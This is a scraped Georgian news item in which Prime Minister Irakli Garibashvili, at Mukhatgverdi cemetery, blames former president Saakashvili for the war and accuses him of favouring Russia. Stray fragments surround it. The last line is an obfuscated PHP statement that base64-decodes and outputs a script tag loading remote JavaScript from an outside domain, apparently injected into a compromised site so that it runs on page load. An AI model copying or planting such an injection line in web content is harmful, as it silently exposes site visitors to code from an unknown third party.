celsiusi
ავერსი შნაიდერი
პრემიერ–მინისტრმა, ირაკლი ღარიბაშვილმა მუხათგვერდის ძმათა სასაფლაოდან კიდევ ერთხელ გააკრიტიკა წინა ხელისუფლება და მესამე პრეზიდენტი.
 
"თქვენი ტელევიზიების დე ფაქტო მფლობელი, ყოფილი პრეზიდენტის სააკაშვილის უგუნურმა პოლიტიკამ, მისმა გაუთვლელმა პროვოკაციულმა ნაბიჯებმა, განაპირობა ის, რომ მათ თავიდან ვერ აიცილეს აი ეს ტრაგიკული ომი. ეს იყო სააკაშვილის და მისი გუნდის ღალატი, მათ გაიწრეს ჩვენი ქვეყანა და გაწირეს ჩვენი ხალხი, გაწირეს ჩვენი სამხედროები. მე კიდევ ერთხელ მინდა ვთქვა შემდეგი, თქვენთან საუბარს მე ვასრულებ, ეს არის ჩვეულებრივი პროვოკაციული კითხვები", - განუცხადა მედიას ღარიბაშვილმა. 
 
მისი თქმით, 2009 წლიდან სააკაშვილმა რუსულ სახელმწიფო ორგანიზაციებზე სტრატეგიული ობიექტების გადაცემა დაიწყო, ასევე, ცალმხრივად გააუქმა უვიზო რეჟიმი რუსეთის მოქალაქეებისთვის.
477
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");